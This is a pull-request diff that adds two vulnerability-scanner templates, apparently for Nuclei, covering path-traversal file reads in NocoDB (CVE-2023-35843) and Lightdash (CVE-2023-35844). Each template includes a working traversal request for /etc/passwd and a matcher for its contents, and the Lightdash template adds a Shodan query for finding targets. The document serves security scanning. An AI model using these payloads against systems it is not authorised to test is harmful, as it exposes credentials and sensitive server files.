Merge pull request #7491 from dwisiswant0/add/DW1-59-60
add(http/cves): CVE-2023-35843 & CVE-2023-35844patch-1
commit
5266fee162
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2023-35843
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NocoDB version <= 0.106.1 Arbitrary File Read
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
NocoDB through 0.106.1 has a path traversal vulnerability
|
||||||
|
that allows an unauthenticated attacker to access arbitrary files on
|
||||||
|
the server by manipulating the path parameter of the /download route.
|
||||||
|
This vulnerability could allow an attacker to access sensitive files
|
||||||
|
and data on the server, including configuration files, source code,
|
||||||
|
and other sensitive information.
|
||||||
|
reference:
|
||||||
|
- https://advisory.dw1.io/60
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-35843
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,nocodb,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2023-35844
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Lightdash version <= 0.510.3 Arbitrary File Read
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
packages/backend/src/routers in Lightdash before 0.510.3
|
||||||
|
has insecure file endpoints, e.g., they allow .. directory
|
||||||
|
traversal and do not ensure that an intended file extension
|
||||||
|
(.csv or .png) is used.
|
||||||
|
reference:
|
||||||
|
- https://advisory.dw1.io/59
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-35844
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"Lightdash"
|
||||||
|
tags: cve,cve2023,lightdash,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue